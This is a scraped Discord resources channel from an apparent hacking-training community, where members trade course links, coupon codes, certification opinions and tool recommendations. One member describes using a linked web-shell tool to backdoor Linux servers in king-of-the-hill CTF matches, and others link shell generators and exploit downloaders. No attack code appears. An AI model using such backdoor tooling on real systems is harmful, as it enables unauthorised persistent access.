hi
#resources
balmy merlin
i need real help
With?
karmic axle
hacking
odd quest
More specifically?
odd quest
do u guys hack into things
What do you mean by "things"?
karmic axle
uh like ppls account for stuff am learning am not gonna do anything to there accounts
odd quest
-ban @karmic axle Said they wanted to hack people's accounts. Ban appeals are by email: bans@tryhackme.com
odd sinewBOT
🔨 Banned SM_sGHg#6788 indefinitely
lost oracle
@odd quest i need WordPress website pentesting tool
plush hedge
<@252418040388517888> i need WordPress website pentesting tool
Try wpscan
lost oracle
Try wpscan
hmm ok
crimson ore
Hi guys. Does anyone know how to install volatility on kali linux? I am having 'failed to import volatility ...' errors.
surreal jasper
https://www.codecademy.com/learn/introduction-to-cybersecurity came across this free basic course. Probably not useful for most of us on here but might be one to recommend for a good basic grounding in cyber.
tranquil shuttle
jagged haven
https://enotes.nickapic.com/
Awesome resource, a lot of bits and bobs that we might forget during work. Great job.
Oh btw do you think you could put it up for duplication? If not then np I will just bookmark it
tranquil shuttle
Awesome resource, a lot of bits and bobs that we might forget during work. Great...
thanks a lot , i am glad it helps
tranquil shuttle
Oh btw do you think you could put it up for duplication? If not then np I will j...
i dont think i can do that it notion unfortunately
jagged haven
i dont think i can do that it notion unfortunately
its by using share > share to web > allow duplicate as template
jagged haven
Oh yes I see, I didnt work with fruition yet so Idk either but np, thx for the resources :v
tepid patio
Pretty cool app for URL analysis https://github.com/obsidianforensics/unfurl
tepid patio
They also use name-that-hash 😉
tawny stone
Just released v0.6 of stegseek (a fast steghide cracker for your favourite steg chals)
https://github.com/RickdeJager/stegseek
changes:
* added a --continue flag to search for multiple passwords
* added an --accessible flag to get rid of most to the terminal bloat
* Improved performance (aka, actually remembered to build in release mode)
* Fixed cracking failing for BMP files (shout out to PicoCTF)
* Added pretty colors
clever dove
Can anyone suggest any deblurring tools for images?
fast wraith
@clever dove maybe this? this focuses on text afaik
https://github.com/beurtschipper/Depix
clever dove
That's not what I was looking for exactly, but I found a tool called deblur on github. Thanks by the way.
gaunt rain
Does any1 of you know of, or did research on a comparison of dirbuster, dirb, gobuster, ZAP and Burps directory brute forcing speeds on same settings (e.g. no recursion) or can tell from their experience what tool to prefer? My experiences with gobuster are very good, how are yours?
remote wind
Feroxbuster is very fast ig, didn't tried myself though
gritty barn
Feroxbuster is very fast ig, didn't tried myself though
feroxbuster is a beast. it has the autotune future to ensure that you get the least amount of errors
fast wraith
nice little primer on the command line (linux specifically)
https://github.com/jlevy/the-art-of-command-line
azure widget
barren vault
dim ember
Hey guys i was wondering if THM has any bluetooth hacking or protocol related rooms thanks !
In general would like any sort of resources related to bluetooth hacking thanks !
surreal marsh
hexed sable
Im thinking of creating automated characteristing testing of the request flow from burp suite, or similar recorded flows, anyone familiar with automated testing such as this? 🙂
Trying to figure out how to start refactoring a large legacy codebase without crashing areas of the system at each change
fast wraith
having Signal on your phone might make forensic evidence extracted your phone inadmissable in court, also Cellebrite is being naughty and potentially using Apple DLLs without license
https://signal.org/blog/cellebrite-vulnerabilities/
topaz gulch
That article is hilarious
fast wraith
By a truly unbelievable coincidence, I was recently out for a walk when I saw a small package fall off a truck ahead of me. As I got closer, the dull enterprise typeface slowly came into focus: Cellebrite.
lmfao
sonic abyss
topaz gulch
lmfao
It was the "aesthetically pleasing" files being shipped to random users' phones in the last paragraph that had me absolutely howling
flint bison
It was the "aesthetically pleasing" files being shipped to random users' phones ...
Same here. Just to protect them legally
tepid patio
crimson thunder
https://www.simplycyber.io/free-cyber-resources
thanks for sharing. can you give feedback to any of these if you've checked them out? I mean, other than the most prominent ones, like portswigger and msfu
odd sinewBOT
Gave +1 Rep to @sonic abyss
brave fox
tepid patio
tepid patio
^^ weekly recap of all cyber security news this week
worldly flower
Hello community! Meet dystic, an open-sourced application designed to make job search more accessible towards individuals with disabilities.
View our demo video here that we presented to Google Cloud Platform!
https://www.youtube.com/watch?v=z8pLLa1Dygc
The link to the repository here: https://github.com/arnavs-0/dystic
You can also preview the application here: https://dystic.web.app
Special thanks to Google Cloud Platform for sponsoring our project! We hope to make it even better through contributors and supporters in the future.
If this sounds interesting to you, please fork our project and be part of the team.
Let's make job search more accessible!
shut ferry
Does anyone have any good resources explaining port forwarding and proxies? they're too confusing, I don't really understand it and it's kind of annoying me lol
Like I think i kind of understand port forwarding but proxies confuse the hell out of me
odd quest
Done wreath?
grim jasper
@shut ferry I highly suggest you to do this easy and fun room https://tryhackme.com/room/chillhack and read this write-up throughout and you will definitely understand the basic idea behind port forwarding (you will see it happen live). https://musyokaian.medium.com/chill-hack-walkthrough-tryhackme-498aa9ad1388 Just go out of the comfort zone and do port forwarding using the two methods used by the write-up author (SSH and Chisel) and you shall understand.
shut ferry
<@456226577798135808> I highly suggest you to do this easy and fun room https://...
Nice, thanks a lot man! I'll give it a look
odd sinewBOT
Gave +1 Rep to @grim jasper
odd quest
I'd 100% recommend wreath tho, seeing as it explains those methods thoroughly
surreal jasper
Yeah wreath is incredible 🙂
grim jasper
@odd quest But a bit more advanced than the others
shut ferry
I'm trying to learn chisel syntax but I'm finding it extremely hard and frustrating because I don't really understand what's going on in the syntax (like why --socks5 is used sometimes and other times not, same with --reverse)
or when I should put attacking_ip:listen_port compared to maybe target_ip:listen_port
odd quest
I mean, I think it's better to have the content walked through than to read the writeup for a box and do it without understanding
shut ferry
thats why i figured i should try to understand proxies and port forwarding
i feel like learning the syntax just by memory sure that would work but i wouldn't really understand why the specific syntax is used
i might just push on with wreath though, I'm sure it'll become a little more clear on the practical task
grim jasper
@odd quest Nah, the write-up i mention is easy enough to explain the idea without using a word since you will see what is happening by pictures and you will get to see it with your system.
odd quest
But does it explain how it actually works beyond the effects?
shut ferry
i think ill keep going to the practical task and if im still confused by then, ill try to understand proxies and port forwarding more
that way I won't get "stuck" for no reason
grim jasper
@odd quest No thats not what I am after
odd quest
Pretty sure that's what blund is after?
A technical explanation of the concepts rather than just the practical effects?
shut ferry
yeah I think I got the hang of the effects of proxies and port forwarding (isnt it essentially used to get around something, like a firewall blocking a certain port)
its really confusing because i feel like i somewhat understand it but then when i try to learn syntax it's like "wait what??"
grim jasper
@shut ferry This will also help you if you want to practice port forwardin https://tryhackme.com/room/badbyte
shut ferry
<@456226577798135808> This will also help you if you want to practice port forw...
Thanks! 
odd sinewBOT
Gave +1 Rep to @grim jasper
grim jasper
@shut ferry Most welcome 👍
shut ferry
Tbh maybe I'm just overthinking the syntax, it will prob come naturally the more i use chisel and port forwarding etc
grim jasper
True true
the same when I first learned transferring files using nc, you will be confused and refer the website that teachers the method zillion times then it comes naturally
(For anyone interested: https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/)
(Much simpler and quicker than using a http.server ;D)
crimson thunder
Does anyone have any good resources explaining port forwarding and proxies? they...
another page that has helped me is a section in msfu, let me look for it
shut ferry
https://cph.opsdisk.com/
Thanks a lot!
odd sinewBOT
Gave +1 Rep to @crimson thunder
gritty barn
https://cph.opsdisk.com/
concatanate the infosec resource hoarder
crimson thunder
I had to for ejpt 😉
gritty barn
yeah, you always go overprepared
crimson thunder
not in this topic, cause I remember searching for something comprehensive on pivoting but couldn't find something (other than the book I mentioned before)
in the end I used my own joplin notes from the ton of articles I had read
come to think of it, I should write the thing 😛
gritty barn
in the end I used my own joplin notes from the ton of articles I had read
nice good luck with it 😄 joplin is brilliant, you can also create roadmaps with mermaidjs
i was thinking of putting roadmaps on my website(ghost) with mermaid js
i have my notes in joplin with it, so it's quite easy to just lift and shift
crimson thunder
if you do it send me a link to check it out
fervent sky
any buffer overflow resources
glacial gazelle
any buffer overflow resources
tib3rius and TCM have some good content on it
they're more focused on Windows though iirc, as OSCP prep
if you want buffer overflow and so, so much more
fervent sky
if you want buffer overflow and so, *so* much more
Thanks
odd sinewBOT
Gave +1 Rep to @glacial gazelle
gritty barn
if you do it send me a link to check it out
will do 🙂
inner token
Hey hackers,
Here's the practical demo video of automated-exploit-downloader script.
Hoping that it adds some value in your pentesting process
ocean parcel
whys the link say youtu.be instead of youtube.com
timber holly
whys the link say youtu.be instead of youtube.com
It is the same thing?
languid lily
virustotal.com say its clean so...
timber holly
https://youtu.be/3tg7W1Sg9_Y redirects to https://www.youtube.com/watch?v=3tg7W1Sg9_Y
Basically youtu.be is a YT link shortener.
upbeat token
For some additional context: When you use the Share feature of the YouTube mobile app, it generates a https://youtu.be link
remote wind
any buffer overflow resources
Check pins, there are a lot
hasty fox
For some additional context: When you use the Share feature of the YouTube mobil...
Share feature on any platform on YouTube I think, not just mobile
grim crown
an article I wrote :p https://husse1n.com/windows-child-parent-process-relationship/
glacial gazelle
atomic forge
What are the best books to start pen testing? Any suggestions please.....
glacial gazelle
link above has a coupla recommendations
flint shadow
Does anyone have a good resource for setting up a python2 and impacket docker container to run older exploits that haven't been ported to python3?
flint bison
Building a docker container for python2 should be fairly straightforward. I don't know anything about impacket though
flint shadow
Building a docker container for python2 should be fairly straightforward. I don'...
I ended up just installing pip2.7 so I can get impacket for python2
fast wraith
Heath is getting ready to release his certification exam in a week, im impressed he kept the price point he originally promised - definitely one Ill consider
https://twitter.com/thecybermentor/status/1386908806773362690
Twitter
tranquil shuttle
I was doing this thing where i try to learn and note topics i learn everyday maybe it would help or motivate someone to do the same :
pure schooner
@tranquil shuttle Great 💯
tranquil shuttle
<@!202373584629268480> Great 💯
thaanks a lot 
crimson thunder
topaz gulch
worldly palm
ooh cute
fast wraith
new Sysmon update
This update to Sysmon adds a FileDeleteDetected rule that logs when files are deleted but doesn't archive
tame rose
remote wind
Plus CC:ghidra and radare2 room
devout coral
https://beginners.re/
dude its payed
faint sluice
all those resources are free
maybe you should've clicked the link to see the free book
devout coral
dude can you send me
faint sluice
I gave you the link
faint sluice
click the link within the link
crimson thunder
I'm getting worried
faint sluice
do you see big ass letters that say "Proceed to the website"?
devout coral
yah
faint sluice
and?
faint sluice
you on the page, you then download the book in whatever language you want
faint sluice
so apparently you have to pay at least $1 to access the book, if you don't wanna pay $1, then look at the other links I posted
it used to be free but its a very popular book and he probably wanted a little money from it
fast wraith
The Cyber Mentor just announced his certification, ik it won't have much recognition but its very affordable and has a pretty impressive scope - i just got a voucher and looking to take it later this year
https://twitter.com/thecybermentor/status/1387844742650662914
Twitter
crimson thunder
The Cyber Mentor just announced his certification, ik it won't have much recogni...
Agreed, that seems great.
crimson thunder
devout coral
that's the book
cursive cloud
Its a private server link @devout coral
crimson thunder
https://scriptingxss.gitbook.io/firmware-security-testing-methodology/ this as a resource is amazingly good
glad bolt
Hello I am new to tryhackme discord. I was wondering if anyone had any advice on where to go to a little bit more about bug bounties and to just improve my skills on hacking
flint bison
gentle shuttle
https://github.com/watchdog2000/WatchdogsPerch-WebShellHandler this is how I backdoor linux systems in KOTH matches sometimes, to leave a vulnerability on the server hidden away. I also use this instead of immediately uploading a pentest monkey shell, instead using this to catch a shell or enumerate. It offers more flexibility in places.
devout coral
hey i need one more help
can anyone suggest me best and beginner tool for reverse engeering
light crystal
try reading @remote wind blog. he has some good blogs
@remote wind can u please shar elink/
remote wind
weary peak
The Cyber Mentor just announced his certification, ik it won't have much recogni...
To be honest, I'm sorta interested
It looks affordable, and contains useful information while studying for the cert. It's probably best used to increase knowledge
shut ferry
shut ferry
The Cyber Mentor just announced his certification, ik it won't have much recogni...
Hey! Do you know maybe if this is introductory price, or it will stay on that level?
fast wraith
Hey! Do you know maybe if this is introductory price, or it will stay on that le...
im not sure tbh, its possible it could become more expensive if the demand rises enough
tepid patio
I updated the website after so long. If downloading CLI tools isn't your thing check out the website by @night plinth ! ❤️ 😄 https://twitter.com/bee_sec_san/status/1388804441332195329
light crystal
shut ferry
im not sure tbh, its possible it could become more expensive if the demand rises...
Ok. Thanks!
odd sinewBOT
Gave +1 Rep to @fast wraith
formal dust
Can anyone provide me nmap best course
odd quest
fickle mulch
Can anyone provide me nmap best course
I have found this course useful : https://www.udemy.com/course/the-complete-nmap-ethical-hacking-course-network-security/
fickle mulch
But can i get any feee course
you can search in youtube. Watch video tutorial then practice in THM.
As a beginner, watching videos at first, helps to get concept easily. Then THM helps to be better at any skill.
light crystal
Can anyone provide me nmap best course
https://aksheet10.medium.com/what-is-nmap-218784bcb495 even try this i spent some time making this
quiet fox
If anybody struggling with gitbash and git commands read this medium article your all doubts will be solved that’s for sure.
balmy sun
50% off tcm courses with 50OFFSITEWIDE coupon
small night
50% off tcm courses with `50OFFSITEWIDE` coupon
Here's a link : https://academy.tcm-sec.com/courses
muted lagoon
having Signal on your phone might make forensic evidence extracted your phone in...
Might make public and private digital forensics labs to look around for pen testers to assess risks in their all digital forensics suites
lusty stirrup
https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/
absolutely amazing resource, thanks a lot for sharing!
odd quest
gleaming wind
Here's a link : https://academy.tcm-sec.com/courses
Anyone take any of these courses? Thoughts?
small night
Anyone take any of these courses? Thoughts?
I might sound biased because I'm an admin over there at TCM discord but I don't get any money from his sales 😆
But IMO the PEH is by far the best course to get started when you just have basic foundational skills.
The privesc courses are very good but I've heard Tiberius courses are awesome too. Some people prefer one some people prefer the other.
The OSINT and EPP courses are great because there isn't much material out there teaching this stuff
warped pulsar
I took one of tcm's courses
I havent started yet but i was told its great quality
I took the 25 hour course because it had a discount on udemy
faint sluice
so you got it/purchased it but haven't taken it yet? I have done half but got distracted but PEH is a great course
warped pulsar
i bought it on the udemy site yesterday
but havent started it yet
i hope its good
thats what i meant by took, i didnt complete the course per because i just bought it (and it was also late at night so i didnt bother starting it)
faint sluice
No prob, yeah it’s a solid course
fickle mulch
Anyone take any of these courses? Thoughts?
PEH is good enough. I have completed it.
I have faced problem in the Active Directory section.
Because I don’t have a 32GB ram pc and that section requires more knowledge on windows.
However the rest of the course is good for a beginner.
Currently completing TCM OSINT course and this is awesome
shut ferry
Can I have something for Blue Team Path? Some books or something to read on and practice..and also am trying to grasp the THM defense path and enjoying that
south marlin
Can I have something for Blue Team Path? Some books or something to read on and ...
Defensive Security Handbook (2017)
Blue Team Handbook: SOC, SIEM, and Threat Hunting (V1.02): A Condensed Guide for the Security Operations Team and Threat Hunter (2019)
shut ferry
Defensive Security Handbook (2017)
Blue Team Handbook: SOC, SIEM, and Threat Hun...
Thanks will surely look for them
odd sinewBOT
Gave +1 Rep to @south marlin
limber igloo
Hi guys !
Does someone know a good podcast related to cybersec ?
flint bison
I've heard people mention darknet diaries, but I haven't used it personally
unreal hollow
darknet diaries, cyberwire, the hacker mind are a few good ones
limber igloo
Thank you ! I'm going to start darknet diaries
fast wraith
script I made to parse PCAP files with the help of zeek and some other basic utilities - may help with the recent room release 😉
https://github.com/Droogy/noCap
jaunty pulsar
Anyone take any of these courses? Thoughts?
The ethical hacking one is in my opinion very good
im at buffer section
barren mortar
vital quest
hi
balmy sun
BOUNTYPLZ https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/ 71%-off code
little sundial
scylla down, any alternatives?
odd quest
It moved
balmy merlin
I think it's this one it moved to https://scylla.so/
little sundial
Oh, I see, thanks folks! 
fast wraith
you can use the wayback machine to view cached version of scylla, kinda annoying but gets the job done
fickle mulch
`BOUNTYPLZ` https://www.udemy.com/course/intro-to-bug-bounty-by-nahamsec/ 71%-of...
Thank you @balmy sun.
Also, Please give me a feedback if you have completed it
odd sinewBOT
Gave +1 Rep to @balmy sun
gleaming wind
I might sound biased because I'm an admin over there at TCM discord but I don't ...
Thanks
odd sinewBOT
Gave +1 Rep to @small night
gleaming wind
PEH is good enough. I have completed it.
I have faced problem in the Active Dire...
👍
keen delta
hoary tartan
Hello I am new to this discord server
Anyone here to welcome me 😁😁
sacred shoal
https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/
Thanks!
odd sinewBOT
Gave +1 Rep to @fickle mulch
vocal fjord
hey, I am looking for a specific wordlist, any idea where I can find some if google does not want to help me?
sonic abyss
rockyou.txt ?
crimson thunder
hey, I am looking for a specific wordlist, any idea where I can find some if goo...
lol
here you go https://github.com/danielmiessler/SecLists
you can also sudo apt install seclists
also check /usr/share/wordlists on your kali box in case the one you're looking for is already there
vocal fjord
thanks, I knew about them, but as I said I need a specific one 😄 or more precisely a star wars wordslist
What I did now was to copy the transcripts of some episodes of the mandalorian and extracted all unique words, but obviously some word combinations (like bounty hunter) will not be in that list
fast wraith
cool blog detailing an open-source investigation into APT operators from China
https://intrusiontruth.wordpress.com/2021/05/06/an-apt-with-no-name/
sonic abyss
List of OSINT challenges / CTF's, when I get the time i'll add some more:
https://courses.thecyberinst.org/courses/osint-challenge
https://sourcing.games/game-1/
https://twitter.com/quiztime
https://courses.thecyberinst.org/courses/osintmini
https://twitter.com/Sector035/status/1211038518635614208
https://www.tracelabs.org/initiatives/search-party
https://tryhackme.com/room/geolocatingimages
https://tryhackme.com/room/googledorking
https://tryhackme.com/room/sakura
https://tryhackme.com/room/searchlightosint
https://tryhackme.com/room/somesint
https://ctf.cybersoc.wales/
https://tryhackme.com/room/ohsint
https://geoguessr.com
https://cyberdefenders.org/labs/38
https://app.hackthebox.eu/challenges
https://tracelabs.org/slack
https://tryhackme.com/room/mnemonic
https://tryhackme.com/room/jpgchat
https://tryhackme.com/room/shodan
lyric rune
hey I was wondering if any of you guys happened to like work like a job in cyber security? cause I have a question about like college.
faint sluice
try #cyber-and-careers and just ask your question there
shut ferry
Hello Guys, I just wanted to share with you another resource that I've found useful especially for people starting in this career
- They have some interesting articles
https://null-byte.wonderhowto.com/
~Happy Hacking!~
lyric heron
ah yes this is a totally smart idea that wont use the entire drive :P
flint bison
Maybe you just need a bigger drive?
flint bison
Too bad yahoo answers shut down
crimson thunder
If you can download ram, I don't see why that wouldn't be possible as well
warped pulsar
I mean you cant do that either
cursive cloud
Reposting this again, because the link @quiet fox shared here was not of this server:
Git Cheatsheet by Denver44
https://denver44.medium.com/git-cheat-sheet-e0425f3c466e
quiet fox
Reposting this again, because the link <@!828835779404496896> shared here was no...
Okay 😊
remote wind
@shut ferry
shut ferry
<@456226577798135808>
Thanks
odd sinewBOT
Gave +1 Rep to @remote wind
shut ferry
Does anyone have some good up-to-date static binaries?
odd quest
The andrewd repo has steps for building your own
balmy merlin
This was just posted on our reddit, free udemy course on SQL injections https://www.udemy.com/course/sql-injections-unlocked-sqli-web-attacks/?couponCode=8MAY-SQLI
light crystal
This was just posted on our reddit, free udemy course on SQL injections https://...
me who enrols in any course
balmy merlin
I used to do that just because it's free
frank plover
Anyone preparing for Sec+. I found this gem last night. It's a great review/overview of all the concepts
wanton estuary
me who enrols in any course
Same bruh 🤣🤣
wanton estuary
This is like how to slap someone through internet
shut ferry
If anyone is interested in Forensics here it is a huge Github's repo about it, enjoy !
The same goes for Malware Analysis
Plus global resources on any cybersecurity subjects, will share more if anyone's interested 
gentle shuttle
https://github.com/watchdog2000/auth.log-connections-parser the ssh auth log monitor is done. It reports the amount of times connections from the IP are attempted and then reports all users that the IP attempts, and attempts to geolocate the IP too to report where the connection came from in the world.
celest eagle
Stolen from Esqy: https://cdn.discordapp.com/attachments/652632935802994710/840705805832683570/linux_perms_cheatsheet.jpg
flint bison
Stolen from Esqy: https://cdn.discordapp.com/attachments/652632935802994710/8407...
Thank you. I can never remember the order.
odd sinewBOT
Gave +1 Rep to @celest eagle
silent palm
This was just posted on our reddit, free udemy course on SQL injections https://...
awesome. FYI two days left
keen field
great resource
https://www.whonix.org/wiki/Documentation
keen field
if you are confuse about how to find an article in this channel
it's simple as
in: #resources <the text that you want to find e.g. active directory>
tepid patio
This is a cool episode by Michael Bazzel (he just so happens to recommend my tools and says how much he likes them 👀)
bright osprey
Side by side reference sheet, very useful. I can't really explain it on text, so check it out yourself!
glacial gazelle
@tepid patio in the SANS foundations course (sec 275 - I think), they demo Ciphey for about 15/20 minutes 
tepid patio
<@!253088742821068801> in the SANS foundations course (sec 275 - I think), they ...
Wow, really?? That's so cool!!!!
glacial gazelle
Yeah, you got Mr Lyne say about how great it was
lemme clip it for you, real quick
tepid patio
Oooh please, I'd love to see it!!
glacial gazelle
I'll send you a friend request, I think you've got public DMs off
tepid patio
accecpteddd
prisma bison
bee accept my friend request >:(
tepid patio
bee accept my friend request >:(
you never sent me pics of cute ducks, why would i?
sonic abyss
prisma bison
you never sent me pics of cute ducks, why would i?
:(((
balmy sun
HQ blog post regarding OSCP
Contains a ton of resources https://infosecwriteups.com/how-i-passed-oscp-with-100-points-in-12-hours-without-metasploit-in-my-first-attempt-dc8d03366f33
prime mantle
Some resources on learning blockchain would be nice if anyone got anything. Looking for something to start with. I have close to zero knowledge on the topic and I am planning on getting to a decent addable-in-CV-level.
crimson thunder
bee posted some links in #bookclub , unless you're looking for specifically not books
prime mantle
When I said I have close to zero, the only thing making it not zero was the bee's article. 😂
Also, yeah, since my state is in lockdown, books aren't something I can get via delivery, and def not gonna read the pdf of those books. So some courses are preferred :)
ruby anvil
Some resources on learning blockchain would be nice if anyone got anything. Look...
i think thenewboston had a few videos on the matter // https://www.youtube.com/watch?v=Dgj_OStjD1Q&list=PL6gx4Cwl9DGCB3bm4ZuFAm4eADj0VMy_D
prime mantle
i think thenewboston had a few videos on the matter // https://www.youtube.com/w...
uh, thanks, I'll check that I guess, though I need some courses/ for blockchain as a technology. Mostly all I found was just crypto explained.
odd sinewBOT
Gave +1 Rep to @ruby anvil
fallow tiger
Compilation of start hacking websites: https://razvioverflow.github.io/starthacking
shut ferry
light crystal
i dont upload my room notes on git cause its all copy pasta 
tawny stone
Now that the proof of concept exploits for Exiftool's command injection (CVE-2021-22204) are slowly appearing, here's how you could've found the bug yourself, without knowing any Perl:
https://blog.bricked.tech/posts/exiftool/
(first blog post, feedback is appreciated )
prime mantle
https://github.com/protofire/blockchain-learning-path
A reaalllly good learning path for anyone starting out in blockchain.
upbeat token
Sharing in case anyone else is interested: Google has some cloud security talks free online this morning (9am to 1pm US Pacific Time): https://cloudonair.withgoogle.com/events/security-talks-may-2021
(Disclaimer: I work there, though I have no direct connection to the event today)
shut ferry
Just posted my new notes
crimson thunder
fallow tiger
Stacksmashing - Airtags : https://www.youtube.com/watch?v=_E0PWQvW-14
glacial gazelle
Now that the proof of concept exploits for Exiftool's command injection (CVE-202...
great walkthrough!
I love the appearance, and the content is even better ;)
lapis herald
blazing mortar
Twitter
night ether
my very simple guide on how to use apache virtual hosts :)
(i moved it from my other website because gitbook is much easier to edit than the previous custom site)
https://work.jake-ruston.com/setup-guides/apache-virtual-hosts
night ridge
@shut ferry haii can u add me also
@shut ferry i need some help in ctf can u help me
odd quest
@night ridge Asking for help with active CTFs is generally regarded as cheating.
odd quest
If it's for a tryhackme room, please use #room-hints or #room-help
small steeple
shut ferry
@flint vault
light crystal
@glacial gazelle nice 1
tranquil shuttle
https://github.com/Mercury-180/AllInOneShell
ohhhh daaamn
tranquil shuttle
https://github.com/Mercury-180/AllInOneShell
Thanks for sharing gonnna use it in BG
odd sinewBOT
Gave +1 Rep to @glacial gazelle
remote wind
https://github.com/Mercury-180/AllInOneShell
GG 
tepid patio
https://github.com/Mercury-180/AllInOneShell
nice one!
plain jetty
is CEH that bad?
odd quest
Yes
sonic abyss
yes
odd quest
Outside of India, it holds practically no value
fallow tiger
Still some companies want it 
plain jetty
oh lol, do you know why that is?
warped pulsar
Im only thinking of getting security+ and the new cert by cybermentor
odd quest
Still some companies want it <:varg:827486232077664256>
Pretty much India or US DoD only.
The new cert won't have any value to HR yet.
warped pulsar
Any other certs beside ceh and oscp?
I want something that doesnt break the bank because i dont have a proper income
Sorry if in the wrong chat
glacial gazelle
I'm no expert, but I didn't think pentest+ was too reputable, when something like security+ keeps more doors open?
try and catch optional online, I think I've heard him speak about pentest+ before
glacial gazelle
https://github.com/Mercury-180/AllInOneShell
lots of new updates to this one, I'd run a git pull in the directory if you don't want everything to go up in flames like it previously did 😉
jagged tiger
I'm no expert, but I didn't think pentest+ was *too* reputable, when something l...
In the DoD world, pentest+ and security+ and CISSP all fill the same requirements bucket
glacial gazelle
In the DoD world, pentest+ and security+ and CISSP all fill the same requirement...
ah sure, I've only heard people speak about it from a private recruiter point of view
and judging by the CEH, DoD does things pretty differently...
faint sluice
It seems like any time anyone tries to do these things, they don't know what they are talking about. I'd wipe most of the certs out of the InfoSec path. Server+? MCSA? CCDP? CCNP? MCSE? Others here are just overall nope
jagged tiger
and judging by the CEH, DoD does things pretty differently...
I'm pretty sure the CEH is on the DoD list because it was one of the first security domain certs, not because its good. Once a thing is on a government list, it is really difficult to get it taken off without a really strong argument. Industry consensus isn't enough
tranquil shuttle
yeaah I think Pentest+ is kinda the same its good for DoD purposes besdies that not really that great
tranquil shuttle
Any other certs beside ceh and oscp?
prob try INE and elearn certs or CRTP is good for red teaming
for learning
prime mantle
Outside of India, it holds practically no value
Inside India, It's like THE cert to get cybersec Job.
It's just sad
faint sluice
wonder what EC-Council did to achieve that
full vapor
https://thexssrat.podia.com/uncle-rat-s-xss-guide?coupon=DUK1P21
Free for about 4 hrs
odd quest
https://lucanuscervus-notes.readthedocs.io/en/latest/Windows/AD - Computer Accounts/
Was trying to read up something about Computer accounts in AD, this was the best I found. You'll probably learn something.
plain jetty
It seems like any time anyone tries to do these things, they don't know what the...
yeah ill agree with that. many of the cert's don't really fit into the security roadmap.
now that you say it... this map is trash.. yeet and delete because it's missleading
balmy sun
what's a good place to learn buffer overflows?
I'm currently on the 7th episode of TCM's course, but it's still a bit confusing\
steel cosmos
what's a good place to learn buffer overflows?
https://tryhackme.com/room/bufferoverflowprep
you can try this
and this can help you too
https://steflan-security.com/complete-guide-to-stack-buffer-overflow-oscp/
balmy sun
https://tryhackme.com/room/bufferoverflowprep
you can try this
that's a CTF with BO's
not the basics of them
balmy sun
and this can help you too
https://steflan-security.com/complete-guide-to-stack-b...
ah thanks
odd sinewBOT
Gave +1 Rep to @steel cosmos
midnight spade
fickle mulch
and this can help you too
https://steflan-security.com/complete-guide-to-stack-b...
This is amazing. Thank you
odd sinewBOT
Gave +1 Rep to @steel cosmos
steel cosmos
sharing is caring i guess ^^'
fast wraith
migrated my blog from Wordpress to Hugo over the weekend, only a few posts left to transfer
https://droogy.tech/
glacial gazelle
migrated my blog from Wordpress to Hugo over the weekend, only a few posts left ...
looks very sexy droogy
plus, it's not wordpress ❤️
fast wraith
ty ty 😄
stuck rover
migrated my blog from Wordpress to Hugo over the weekend, only a few posts left ...
how did you write it/what tools?
fast wraith
how did you write it/what tools?
I just used the Terminal theme from Hugo with a few tweaks and have that deploy the content onto an apache server
stuck rover
interesting. why not use github pages?
fast wraith
i like the flexibility of having a VPS that I can do whatever with, i use droplets from digital ocean and pay about $5 for it
fallow tiger
"Happy Mid-May! Please enjoy this 50% off coupon all courses, bundles, gift certs, and access passes:
Academy (https://academy.tcm-sec.com/) - 50OFFSITEWIDE
Udemy - 50OFFSITEWIDE-UDEMY2
This makes our best selling hacking courses as cheap as $10/course. Good through the week 🙂" - TCM
shut ferry
I don't know if someone already shared it but anyway, saw on Twitter today, enjoy !
https://www.hackingarticles.in/a-beginners-guide-to-buffer-overflow/
modern abyss
pearl blaze
hello friends, is there such thing as a reliable, online, free anti virus checker where I can upload a file and have it check if it has any virus signature? I believe google drive and other cloud providers do this, I am curious if they are using some AV engine that has an open source version available for the public to be used or ported to integrate with your own software
idle mural
this is my route to getting deep into cyber sec
2) hackthebox
3)pentesters lab
4) portswigger academy
5)bug bounties (+ cold hard cash)
6)certs```i cant pay for certs initially,since i dont have any income
but if i can get into bug bounty,i can use that to fund my certs
what do you guys think?
tranquil shuttle
pearl blaze
https://www.virustotal.com/gui/
someone else recommended the same, thank you!
odd sinewBOT
Gave +1 Rep to @sonic abyss
fickle mulch
but if i can get into bug bounty,i can use that to fund my certs
bug bounty isn’t easy bro. Even you can find a bug, there is no guarantee for payment. Too much competitive.
Private programs are good for this reason but it also takes a lot of hard work.
However, keep trying. Play CTF. Try to get experience and job
idle mural
bug bounty isn’t easy bro. Even you can find a bug, there is no guarantee for pa...
thanks bro
odd sinewBOT
Gave +1 Rep to @fickle mulch
idle mural
yes i have reconsidered in the last few hours
it doesnt seem realistic to me
and i dont really like the web
tranquil shuttle
```1) all the tryhackme rooms in this blog https://skerritt.blog/free-rooms/#in...
I would aggree 0xash Bug Bounties are not a stable thing for income imo if you can invest some money in certs that helps you in getting a job soo once you have a job you can use that money for certs
as imho Jobs are more realistic and reliable income source then bug bounties as they tend to be super competetive and then unreliable as well
tranquil shuttle
i meaaaan for 15
idle mural
idk how the job economy works lol
tranquil shuttle
i would say just build your skills atm
i think no company hires before 18 or the legal working age in your country ( Could be 16 or something)
(I could be wrong)
idle mural
cause i cant work because of my age 😆
but i wont be able to fund my certs without money,and i wont get money with a job (which i cant get)
tranquil shuttle
you are starting out young and trust me , its better to chill out with looking for jobs so young
you gotta chill homie you are 15
tranquil shuttle
learn with all the resources you can afford and build your skill
idle mural
maybe just grind on free to affordable content
tranquil shuttle
then you will be a prime candidate for every job you apply
idle mural
until im able to work
tranquil shuttle
thats the spirit
tranquil shuttle
No problemo
idle mural
+rep @tranquil shuttle
odd sinewBOT
Gave +1 Rep to @tranquil shuttle
fallow tiger
Maybe take notes. So you can show the knowledge you got
tranquil shuttle
i will make a small lil repo with my free/affordable resources
idle mural
brilliant!
tranquil shuttle
Maybe take notes. So you can show the knowledge you got
make em public
idle mural
can you dm me 
idle mural
epicc
fallow tiger
#resources message check out this link. There are some good resources @idle mural
idle mural
thank you!!!!!!
tranquil shuttle
I am still adding some stuff about Reversing, Web, Exploit Dev
fierce minnow
thank you!!!!!!
Don't touch my boyfrend
tranquil shuttle
shut ferry
hi does anyone have any resources for bash scripting? (free please)
odd quest
https://overthewire.org/wargames/ Learning the Linux command line in depth first is my recommendation
shut ferry
https://overthewire.org/wargames/ Learning the Linux command line in depth first...
should i also do these rooms besides ruby i feel like i can learn a thing or two
light crystal
